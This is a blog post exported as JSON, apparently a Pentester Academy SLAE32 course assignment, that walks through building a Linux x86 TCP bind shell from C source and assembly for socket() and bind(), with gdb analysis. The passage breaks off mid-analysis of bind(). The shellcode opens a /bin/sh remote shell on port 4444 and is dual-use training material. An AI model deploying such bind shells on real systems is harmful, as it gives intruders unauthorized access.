{"id":274,"date":"2022-05-15T20:52:19","date_gmt":"2022-05-15T20:52:19","guid":{"rendered":"https:\/\/jacklgmcbride.co.uk\/blog\/?p=274"},"modified":"2023-10-06T13:49:55","modified_gmt":"2023-10-06T13:49:55","slug":"slae32-assignment-1-linux-x86-tcp-bind-shell","status":"publish","type":"post","link":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/2022\/05\/15\/slae32-assignment-1-linux-x86-tcp-bind-shell\/","title":{"rendered":"SLAE32 Assignment #1: Linux x86 TCP Bind Shell"},"content":{"rendered":"\n<p>In this blog post, we will be covering the process behind writing and analysing an x86 TCP bind shell for Linux in assembly.<\/p>\n\n\n\n<p>This post will be the first in a series of posts created for the <a href=\"https:\/\/www.pentesteracademy.com\/course?id=3\">SLAE32<\/a> certification course provided by Pentester Academy.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">Overview<\/h2>\n\n\n\n<p>The code for the TCP bind shell will consist of the following components:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Linux x86 TCP bind shell shellcode, written in Assembly.<\/li>\n\n\n\n<li>Shellcode skeleton code, written in C.<\/li>\n\n\n\n<li>Wrapper script for customising the listener port, written in Python.<\/li>\n<\/ul>\n\n\n\n<p>We will begin by analysing a simple example of a Linux x86 TCP bind shell written in C, from the following <a href=\"https:\/\/azeria-labs.com\/tcp-bind-shell-in-assembly-arm-32-bit\/\">blog post<\/a>:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; title: ; notranslate\" title=\"\">\n#include &lt;stdio.h&gt;\u00a0\n#include &lt;sys\/types.h&gt;\u00a0\u00a0\n#include &lt;sys\/socket.h&gt;\u00a0\n#include &lt;netinet\/in.h&gt;\u00a0\n\nint host_sockid;\u00a0\u00a0\u00a0 \/\/ socket file descriptor\u00a0\nint client_sockid;\u00a0 \/\/ client file descriptor\u00a0\n\nstruct sockaddr_in hostaddr;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \/\/ server aka listen address\n\nint main()\u00a0\n{\u00a0\n\u00a0\u00a0\u00a0 \/\/ Create new TCP socket\u00a0\n\u00a0\u00a0\u00a0 host_sockid = socket(PF_INET, SOCK_STREAM, 0);\u00a0\n\n\u00a0\u00a0\u00a0 \/\/ Initialize sockaddr struct to bind socket using it\u00a0\n\u00a0\u00a0\u00a0 hostaddr.sin_family = AF_INET;\u00a0                 \/\/ server socket type address family = internet protocol address\n\u00a0\u00a0\u00a0 hostaddr.sin_port = htons(4444);\u00a0               \/\/ server port, converted to network byte order\n\u00a0\u00a0\u00a0 hostaddr.sin_addr.s_addr = htonl(INADDR_ANY);\u00a0  \/\/ listen to any address, converted to network byte order\n\n\u00a0\u00a0\u00a0 \/\/ Bind socket to IP\/Port in sockaddr struct\u00a0\n \u00a0\u00a0 bind(host_sockid, (struct sockaddr*) &amp;hostaddr, sizeof(hostaddr));\u00a0\n\n\u00a0\u00a0\u00a0 \/\/ Listen for incoming connections\u00a0\n\u00a0\u00a0\u00a0 listen(host_sockid, 2);\u00a0\n\n\u00a0\u00a0\u00a0 \/\/ Accept incoming connection\u00a0\n\u00a0\u00a0\u00a0 client_sockid = accept(host_sockid, NULL, NULL);\u00a0\n\n\u00a0\u00a0\u00a0 \/\/ Duplicate file descriptors for STDIN, STDOUT and STDERR\u00a0\n \u00a0\u00a0 dup2(client_sockid, 0);\u00a0\n\u00a0\u00a0\u00a0 dup2(client_sockid, 1);\u00a0\n\u00a0\u00a0\u00a0 dup2(client_sockid, 2);\u00a0\n\n\u00a0\u00a0\u00a0 \/\/ Execute \/bin\/sh\u00a0\n\u00a0\u00a0\u00a0 execve(&quot;\/bin\/sh&quot;, NULL, NULL);\u00a0\n\u00a0\u00a0\u00a0 close(host_sockid);\u00a0\n\n\u00a0\u00a0\u00a0 return 0;\u00a0\n}\n<\/pre><\/div>\n\n\n<p>We compile the code with gcc:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\ngcc -fno-stack-protector -z execstack example.c -o example\n<\/pre><\/div>\n\n\n<p>To make sure the code does what we expect, we briefly run it and connect to our local machine, on port 4444:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220421122638-e1650551330573.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We connect to the port and note that we are able to perform typical \/bin\/sh commands.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">TCP bind shell syscalls<\/h2>\n\n\n\n<p>Analysing the C code, we identify four main syscalls that are performed to initiate a TCP bind shell. The syscalls are:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>socket()<\/li>\n\n\n\n<li>bind()<\/li>\n\n\n\n<li>listen()<\/li>\n\n\n\n<li>accept()<\/li>\n\n\n\n<li>dup2()<\/li>\n\n\n\n<li>execve()<\/li>\n<\/ul>\n\n\n\n<p>We will cover each of these syscalls by studying their arguments and calling conventions, beginning with an analysis of the call to <strong>socket()<\/strong> in assembly.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Creating a socket<\/h3>\n\n\n\n<p>The <strong>socket()<\/strong> call is used to create an endpoint for communication. A successful call to <strong>socket()<\/strong> returns a file descriptor which refers to the created socket endpoint.<\/p>\n\n\n\n<p>According to the system call reference file stored in 32-bit Linux at \/usr\/include\/i386-linux-gnu\/asm\/unistd_32.sh, the syscall number for socketcall is 102.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220419122207.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>If we look at the man page for socketcall, we note that the syscall takes two parameters and has the following function header:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\nint socketcall(int call, unsigned long *args);\n<\/pre><\/div>\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>Syscall<\/th><th>Argument<\/th><th>Man Reference<\/th><\/tr><\/thead><tbody><tr><td>socketcall<\/td><td>call<\/td><td>Determines which socket function to invoke<\/td><\/tr><tr><td>socketcall<\/td><td>args<\/td><td>Points to a block containing the actual arguments<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>First, we look at the call parameter. The implementation of sockets in linux can be found in the <strong>\/usr\/include\/linux\/net.h<\/strong> header file.<\/p>\n\n\n\n<p>Within this file, we find that to call the <strong>socket<\/strong> function, the call argument must have a value of 1.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220419124414.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>To understand further how a socket is defined, we can refer to its <strong>man<\/strong> page:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220419123827-e1650552412723.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>According to the above manpage entry, the socket function header is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nint socket(int domain, int type, int protocol);\n<\/pre><\/div>\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">socket() arguments<\/h3>\n\n\n\n<p>Next, we look at each of the parameters to the <strong>socket()<\/strong> function.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">domain<\/h4>\n\n\n\n<p>The <strong>domain<\/strong> argument denotes the protocol family which will be used for communication. In our case, as we are looking to establish a connection over the IPv4 protocol, this value will be set to <strong>AF_INET<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220419124040-1.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We can find the corresponding numerical value of AF_INET in locally stored header files. For the version of 32-bit Kali Linux we are working with, the reference to AF_INET can be located in \/usr\/include\/i386-linux-gnu\/bits\/socket.h.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420193916-2.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\">type<\/h4>\n\n\n\n<p>The next argument is the type of socket. As we are setting up bind shell over TCP, we should use the SOCK_STREAM option, which is defined as being 'sequenced, reliable and connection-based' (i.e., suited to TCP).<\/p>\n\n\n\n<p>Based on its definition in \/usr\/include\/i386-linux-gnu\/bits\/socket_type.h, <strong>type<\/strong> should be set to <strong>1<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420194032-1.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\">protocol<\/h4>\n\n\n\n<p>The final argument, <strong>protocol<\/strong> can be set to its default value of <strong>0<\/strong>.<\/p>\n\n\n\n<p>Based on the description given in the manual page, normally only a single protocol provides support a particular socket type. Therefore setting <strong>protocol<\/strong> to 0 sets the protocol to the default value based on SOCK_STREAM.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220419131259-e1650553258796.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">socket() argument structure<\/h3>\n\n\n\n<p>A breakdown of the arguments to <strong>socket()<\/strong> is as follows:<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>Syscall<\/th><th>Argument<\/th><th>Man Reference<\/th><th>C Code Reference<\/th><\/tr><\/thead><tbody><tr><td>socket<\/td><td>domain<\/td><td>The protocol family which will be used for communication<\/td><td>PF_INET<\/td><\/tr><tr><td>socket<\/td><td>type<\/td><td>Specifies the communication semantics<\/td><td>SOCK_STREAM<\/td><\/tr><tr><td>socket<\/td><td>protocol<\/td><td>Specifies a particular protocol to be used with the socket<\/td><td>0<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>Now that we know the initial values to create a socket, we can implement this in assembly.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Calling socket()<\/h3>\n\n\n\n<p>By default, a syscall in 32-bit Linux will use the registers as follows:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>EAX<\/strong> - Syscall Number<\/li>\n\n\n\n<li><strong>EBX<\/strong> - 1st Argument<\/li>\n\n\n\n<li><strong>ECX<\/strong> - 2nd Argument<\/li>\n\n\n\n<li><strong>EDX<\/strong> - 3rd Argument<\/li>\n\n\n\n<li><strong>ESI<\/strong> - 4th Argument<\/li>\n\n\n\n<li><strong>EDI<\/strong> - 5th Argument<\/li>\n<\/ul>\n\n\n\n<p>In case of our system call to <strong>socketcall()<\/strong>, our register values will be set as follows:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>EAX<\/strong> - system call number (102)<\/li>\n\n\n\n<li><strong>EBX<\/strong> - call - socket (1)<\/li>\n\n\n\n<li><strong>ECX<\/strong> - *args - a pointer to the domain, type and arguments<\/li>\n<\/ul>\n\n\n\n<p>As <strong>ECX <\/strong> must contain a pointer to our <strong>socket()<\/strong> arguments, we will first push them onto the stack in reverse order, and set ECX to point to the top of the stack where the arguments start:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>domain - PF_INET - 2<\/li>\n\n\n\n<li>type - SOCK_STREAM - 1<\/li>\n\n\n\n<li>protocol - default - 0<\/li>\n<\/ul>\n\n\n\n<p>The overall argument structure for calling socket will follow the below layout.<\/p>\n\n\n\n<p><strong>Note:<\/strong> decimal values have been converted into their hexadecimal equivalents, e.g. the syscall value 102 = 0x66.<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>Syscall<\/th><th>Argument<\/th><th>Value<\/th><\/tr><\/thead><tbody><tr><td>socketcall<\/td><td>syscall<\/td><td>0x66<\/td><\/tr><tr><td>socketcall<\/td><td>call<\/td><td>0x1<\/td><\/tr><tr><td>socket<\/td><td>domain<\/td><td>0x2<\/td><\/tr><tr><td>socket<\/td><td>type<\/td><td>0x1<\/td><\/tr><tr><td>socket<\/td><td>protocol<\/td><td>0x0<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">socket() assembly code<\/h3>\n\n\n\n<p>The assembly code for the <strong>socket()<\/strong> function is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; title: ; notranslate\" title=\"\">\n_socket:\n\n        ; Clear EAX register and set al to syscall number 102 in hex.\n        xor eax, eax\n        mov al, 0x66 \n\n        ; Clear EBX register and set bl to 0x1 for socket.\n        xor ebx, ebx\n        mov bl, 0x1\n\n        ; Clear ECX register and push values for protocol, type and domain to the stack\n        xor ecx, ecx\n        push ecx;       protocol - 0 (0x00000000)\n        push 0x1;       type - 1 (0x1)\n        push 0x2;       domain - PF_INET (0x2)\n\n        ; set ECX to the top of the stack to point to args\n        mov ecx, esp\n\n        ; Execute socket() syscall\n        int 0x80\n<\/pre><\/div>\n\n\n<p>We can now link and compile the program using nasm and ld as follows:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420195642-1.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">socket() analysis<\/h3>\n\n\n\n<p>To understand the assembly code on a per-instruction basis and debug the compiled program, we can use <a href=\"https:\/\/www.sourceware.org\/gdb\/\">gdb<\/a>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420195407.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>As we step through the program, it helps to print out the registers, stack and disassembled instructions to keep track of where we are in the program. We can do this by defining <em>hook-stop<\/em>:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n(gdb) define hook-stop\nType commands for definition of &quot;hook-stop&quot;.\nEnd with a line saying just &quot;end&quot;.\n&gt;print\/x $eax\n&gt;print\/x $ebx\n&gt;print\/x $ecx\n&gt;print\/x $edx\n&gt;x\/4xw $esp\n&gt;disassemble 0x8049000\n&gt;end\n<\/pre><\/div>\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420195812.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Now, every time we step through the program, the values of our specified registers are printed along with the top four stack values and the disassembled assembly instructions.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420200041.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We can trace the program flow right up until the syscall to <strong>socket()<\/strong> is made, so that we ensure that the arguments are aligned correctly in the required registers and on the stack.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420200152.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We reach the end of the function and find that EAX has been populated with the value of the socket descriptor, <strong>0x3<\/strong>. This indicates a successful call to <strong>socket()<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420200318.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Binding the socket<\/h3>\n\n\n\n<p>Now, we look at binding the socket to a chosen address, port and protocol family.<\/p>\n\n\n\n<p>The <strong>bind()<\/strong> function is used to assign a name to a given socket. When a socket is created, it initially has no address assigned to it. The <strong>bind()<\/strong> function is designed to assign an address to the socket which it does using its file descriptor.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220419141129-1.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>The <strong>bind()<\/strong> function has the following function header:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nint bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);\n<\/pre><\/div>\n\n\n<p>Before we get into the arguments for the bind function, we note that the call argument of <strong>socketcall()<\/strong> will now be set to the value for <strong>bind()<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220419145036-1.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We look at the \/usr\/include\/linux\/net.h file and note that <strong>bind<\/strong> has a call value of <strong>2<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420200546.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">bind() arguments<\/h3>\n\n\n\n<p>Next, we look at each of the parameters to the <strong>bind()<\/strong> function.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">sockfd<\/h4>\n\n\n\n<p>The <strong>sockfd<\/strong> parameter is the file descriptor of the socket. This value was returned following a successful call to the <strong>socket()<\/strong> function and, following the syscall, is stored in the EAX register.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420200318-1.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\">addr<\/h4>\n\n\n\n<p>The <strong>addr<\/strong> parameter is a pointer to the desired <strong>family<\/strong>, <strong>port<\/strong> and <strong>address<\/strong> properties of our socket.<\/p>\n\n\n\n<p>The structure of <strong>addr<\/strong> is loosely defined in the <strong>bind()<\/strong> manual entry.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220419144159.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Referring to the C example source code, we note that the <strong>sockaddr<\/strong> structure is referenced by the <em>hostaddr<\/em> value.<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; title: ; notranslate\" title=\"\">\n\/\/ Initialize sockaddr struct to bind socket using it \n    hostaddr.sin_family = AF_INET;                  \/\/ server socket type address family = internet protocol address\n    hostaddr.sin_port = htons(4444);                \/\/ server port, converted to network byte order\n    hostaddr.sin_addr.s_addr = htonl(INADDR_ANY);   \/\/ listen to any address, converted to network byte order\n\n\/\/ Bind socket to IP\/Port in sockaddr struct \n    bind(host_sockid, (struct sockaddr*) &amp;hostaddr, sizeof(hostaddr));\n<\/pre><\/div>\n\n\n<p>Based on the C source code, the sockaddr_in structure has three properties:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>sin_family - Address family<\/li>\n\n\n\n<li>sin_port - TCP port<\/li>\n\n\n\n<li>sin_address - IPv4 address<\/li>\n<\/ul>\n\n\n\n<p>For the purpose of initially simplifying our shellcode, we will set the <strong>port<\/strong> value to <strong>4444<\/strong>, with the address set to listen across all interfaces as denoted by <strong>INADDR_ANY<\/strong>.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\">addrlen<\/h4>\n\n\n\n<p>The <strong>addrlen<\/strong> value specifies the size of the address structure pointed to by <strong>addr<\/strong> in bytes. This will be 16 (0x10).<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">bind() argument structure<\/h3>\n\n\n\n<p>A breakdown of the arguments to <strong>bind()<\/strong> is as follows:<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>Syscall<\/th><th>Argument<\/th><th>Man Reference<\/th><th>C Code Reference<\/th><\/tr><\/thead><tbody><tr><td>socketcall<\/td><td>call<\/td><td>Syscall number<\/td><td>-<\/td><\/tr><tr><td>socketcall<\/td><td>args<\/td><td>Syscall arguments<\/td><td>-<\/td><\/tr><tr><td>bind<\/td><td>sockfd<\/td><td>Socket file descriptor<\/td><td>host_sockid<\/td><\/tr><tr><td>bind<\/td><td>addr<\/td><td>Socket address family, host IP address and port<\/td><td>&amp;hostaddr<\/td><\/tr><tr><td>bind<\/td><td>addrlen<\/td><td>Size in bytes of addr<\/td><td>sizeof(hostaddr)<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>Additionally, the values pointed to by addr (sockaddr_in) are as follows:<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>Struct<\/th><th>Argument<\/th><th>Man Reference<\/th><th>Value<\/th><\/tr><\/thead><tbody><tr><td>sockaddr_in<\/td><td>sin_family<\/td><td>Address family<\/td><td>0x2<\/td><\/tr><tr><td>sockaddr_in<\/td><td>sin_port<\/td><td>TCP port to listen on in network byte order<\/td><td>0x5c11<\/td><\/tr><tr><td>sockaddr_in<\/td><td>sin_addr<\/td><td>Host IP address in network byte order<\/td><td>0x00000000<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>Now that we know the initial values to bind the socket, we can implement it in assembly.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Calling bind()<\/h3>\n\n\n\n<p>In case of our system call to <strong>socketcall()<\/strong>:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>EAX<\/strong> - system call number (102)<\/li>\n\n\n\n<li><strong>EBX<\/strong> - call argument - bind (2)<\/li>\n\n\n\n<li><strong>ECX<\/strong> - *args - bind arguments<\/li>\n<\/ul>\n\n\n\n<p>To begin, we must push the elements of the sockaddr_in structure to the stack in reverse order, starting with sin_addr.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>sockfd - Stored in EAX after call to <strong>socket()<\/strong>. We will save this value by moving it to the EDX register.<\/li>\n\n\n\n<li>addr - We will store this value in the ESI register.\n<ul class=\"wp-block-list\">\n<li>sin_family - AF_INET (2)<\/li>\n\n\n\n<li>sin_port - 4444 (0x5c11)<\/li>\n\n\n\n<li>sin_addr - INADDR_ANY (0x00000000)<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li>addrlen = 16 (0x10)<\/li>\n<\/ul>\n\n\n\n<p>The overall argument structure for calling <strong>bind()<\/strong> will be as follows:<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>Syscall<\/th><th>argument<\/th><th>Description<\/th><th>Value<\/th><\/tr><\/thead><tbody><tr><td>socketcall<\/td><td>syscall<\/td><td>Syscall value for socketcall<\/td><td>0x66<\/td><\/tr><tr><td>socketcall<\/td><td>call<\/td><td>Socketcall value for bind<\/td><td>0x2<\/td><\/tr><tr><td>bind<\/td><td>sockfd<\/td><td>Socket file descriptor<\/td><td>0x3<\/td><\/tr><tr><td>bind<\/td><td>addr<\/td><td>Pointer to sockaddr_in structure<\/td><td>2, 0x5c11, NULL<\/td><\/tr><tr><td>bind<\/td><td>addrlen<\/td><td>Length of addr in bytes<\/td><td>0x10<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">bind() assembly code<\/h3>\n\n\n\n<p>The assembly code for the <strong>bind()<\/strong> function is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; title: ; notranslate\" title=\"\">\n_bind:\n\n        ; Clear and set EDX to socket file descriptor returned by socket()\n        xor edx, edx\n        mov edx, eax\n\n        ; Clear EAX register and set al to syscall number 102 in hex.\n        xor eax, eax\n        mov al, 0x66\n\n        ; Clear EBX register and set bl to 0x2 for bind()\n        mov bl, 0x2\n\n        ; Push sockaddr arguments for call to bind()\n        xor ecx, ecx\n        push ecx;               sin_addr - INADDR_ANY (0x00000000)\n        push word 0x5c11;       sin_port - 4444 (0x5c11)\n        push word 0x2;          sin_family - AF_INET (2)\n\n        ; Save pointer to sockaddr to ESI register \n        mov esi, esp\n\n        push 0x10;              addrlen - 16 (0x10)\n        push esi;               addr\n        push edx;               sockfd\n\n        ; Set ECX to the top of the stack to point to args\n        mov ecx, esp;\n\n        ; Execute bind() syscall\n        int 0x80\n<\/pre><\/div>\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\">bind() analysis<\/h4>\n\n\n\n<p>We can now step through our implementation of <strong>bind()<\/strong> using gdb.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420202007.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We once again define hook-stop for the scope of the <strong>bind()<\/strong> assembly code:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n(gdb) define hook-stop\nType commands for definition of &quot;hook-stop&quot;.\nEnd with a line saying just &quot;end&quot;.\n&gt;print\/x $eax\n&gt;print\/x $ebx\n&gt;print\/x $ecx\n&gt;print\/x $edx\n&gt;x\/4xw $esp\n&gt;disassemble 0x8049013\n&gt;end\n<\/pre><\/div>\n\n\n<p>As we step through, we note that the instructions save the socket file descriptor to <strong>EDX<\/strong> as intended:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420202303.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>The syscall is set up for the call to <strong>bind()<\/strong>, having moved <strong>0x2<\/strong> to the <strong>bl<\/strong> register:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420202420.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>The values for the listening address, port and protocol family are pushed to the stack:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420202646.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>The <strong>ESP<\/strong> value is moved to the <strong>ECX<\/strong> register, so that <strong>ECX<\/strong> is pointing to the addr values as per the function arguments for <strong>bind()<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420202817.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>After the syscall is made, the value <strong>0x0 <\/strong>is moved into <strong>EAX<\/strong>, indicating that the call was 